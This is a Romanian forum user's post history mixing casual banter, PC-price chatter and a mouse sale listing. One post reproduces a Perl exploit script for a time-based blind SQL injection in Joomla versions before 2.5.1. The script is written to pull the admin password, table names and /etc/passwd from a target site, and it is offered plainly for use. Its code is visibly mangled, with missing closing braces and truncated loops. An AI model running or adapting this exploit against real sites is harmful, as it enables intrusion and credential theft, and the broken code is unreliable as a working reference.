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Posts posted by LLegoLLaS

  1. Ce entuziasmat si ce tare se crede el =)).Pula mea...eu iti doresc noroc dar...

    ps: te cunoaste cineva de pe scara?...ai ceva ciudat in atitutine.

    ''mi s-a facut dedicatie'' - sa moara dusmanii mei

  2. File:

    # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com
    # Joomla <2.5.1 time based sql injection - vuln by Colin Wong
    # using sleep() and not benchmark(), change for < mysql 5.0.12
    # 1.- Database name: database()
    # 2.- Users data table name: (change 'joomla' for database() result)
    # select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
    # 3.- Admin password: (change zzz_users from previus sql query result)
    # select password from zzzz_users limit 1
    use strict;
    use LWP::UserAgent;
    $| = 1;
    my $url = $ARGV[0];
    my $wtime = $ARGV[1];
    my $sql = $ARGV[2];
    unless ($ARGV[2]) {
    print "$0 <url> <wait
    time> <sql>\n";
    print "\texamples:\n";
    print "\t get admin password:\n";
    print "\t\t$0 http://host/joomla/ 3 'database()'\n";
    print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
    print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
    print "\t get file /etc/passwd\n";
    print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
    exit 1;
    my ($len,$sqldata);
    my $ua = LWP::UserAgent->new;
    my $stime = time();
    my $res = $ua->get($url);
    my $etime = time();
    my $regrtt = $etime - $stime;
    print "rtt: $regrtt secs\n";
    print "vuln?: ";
    my $sleep = $regrtt + $wtime;
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope \n"; exit 1; }
    my $lenoflen;
    sub len {
    # length of length
    for (1..5) {
    my $sql=$_[0];
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) {
    $lenoflen = $_;
    for (1..$lenoflen) {
    my $ll;
    for (0..9) {
    my $sql=$_[0];
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) {
    $len .= $_;
    return $len;
    sub data {
    my $sql = $_[0];
    my $len = $_[1];
    my ($bit, $str, @byte);
    my $high = 128;
    for (1..$len) {
    my $c=8;
    my $a=$_;
    for ($bit=1;$bit<=$high;$bit*=2) {
    $stime = time();
    # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
    $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) {
    } else { $byte[$c]="1"; }
    $str = join("",@byte);
    print pack("B*","$str");
    $len = len($sql);
    print "$sql length: $len\n";
    print "$sql data:\n\n";
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  3. daca scazi ce ai spus tu si lasi doar 4gb ram = ~21 milioane

    acolo is 30 mil cu tot cu hard (e luata ultima valoare cand a fost disponibil adica undeva la 380 lei)

    ps: majoritatea le recomand pe emag.Wishlistul e pe pcgarage ca emagu are un site greoi

  4. Vand Microsoft Arc Touch negru.Folosit o saptamana.Garantie 2 ani la producator,cutie completa.

    Schimb cu nokia dualsim sau stickuri de 32gb (Kingston DTR500 sau echivalent).Pret negociabil.Pentru schimburi valoarea este mai mare.

    Imi rezerv dreptul sa refuz o oferta si/sau sa refuz in functie de numarul/calitatea posturilor de pe forum.O sa postez si poze in curand.


  5. 5coduri:


    Basescu e Tripat

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